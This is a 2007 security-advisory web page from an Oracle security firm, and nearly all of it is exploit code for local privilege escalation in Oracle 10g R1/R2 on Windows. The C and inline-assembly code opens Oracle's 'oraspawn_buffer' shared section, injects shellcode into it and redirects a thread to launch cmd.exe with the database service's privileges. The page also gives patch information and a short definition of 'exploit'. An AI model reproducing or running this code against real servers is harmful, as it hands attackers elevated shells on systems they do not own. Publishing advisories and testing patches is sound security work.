Local Privilege Escalation in Oracle 10g R1/R2

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Local Privilege Escalation in Oracle 10g R2

Name Local Privilege Escalation in Oracle 10g R2

Systems Affected Oracle 10g R1/R2

Severity Low Risk

Category Privilege Escalation

Vendor URL http://www.oracle.com/

Credit Cesar Cerrudo

URL http://www.milw0rm.com/exploits/3451

Date 25 Mar 2007 (V 1.00)

Details

The following exploit code allows local privilege escalation on Windows. To run this exploit you must have a local shell on the database server.

Example

#include
#include

BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID)
{
HMODULE hKernel;
FARPROC pCreateProc;
LPSTR sCommand="cmd.exe";
DWORD dwStrLen;
CHAR buff[100];

dwStrLen=strlen(sCommand);

hKernel=LoadLibrary("Kernel32.dll");
pCreateProc=GetProcAddress(hKernel,"CreateProcessA");

strcpy(buff, "Global\\*oraspawn_buffer_");
strncat(buff, oSID,50);
strcat(buff, "*");

HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff);

if (hMapFile == NULL) {
printf("Could not open Shared Section\n\n");
return FALSE;
}
else
printf("Shared Section opened\n");

LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);

printf("Inserting shellcode...\n");

CHAR sWinSta[]="WinSta0\\Default";

//copy shellcode
_asm {

pushad

lea esi, Shellcode
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb

pop edi
pop esi
push edi

lea ecx, CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, dwStrLen
rep movsb
mov [edi], 0x00

pop edi
mov esi, pCreateProc
mov [edi+0x0a], esi

mov esi, oldEIP
mov [edi+0x0e], esi

add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb

jmp Done

Shellcode:
jmp Start
// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff

CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer
pushad

mov eax, edx
add eax, 0x200
push eax //LPPROCESS_INFORMATION
add eax, 0x200
mov ebx, edx
xor bl, bl
lea ecx, [ebx+0x2f0]
lea ebx, [eax+0x8]
mov [ebx], ecx //set windows station and desktop
push eax //LPSTARTUPINFO
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0

lea eax, [edx-0x47]
push eax // Command offset

push 0x0
call [edx-0x4f] // Call create process

popad

push [edx-0x4b] // old thread EIP
ret
End:

Patch Information
Apply the patches mentioned in Oracle Critical Patch Update July 2006.

ƒD 2007 by Red-Database-Security GmbH - 25-mar-2007

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.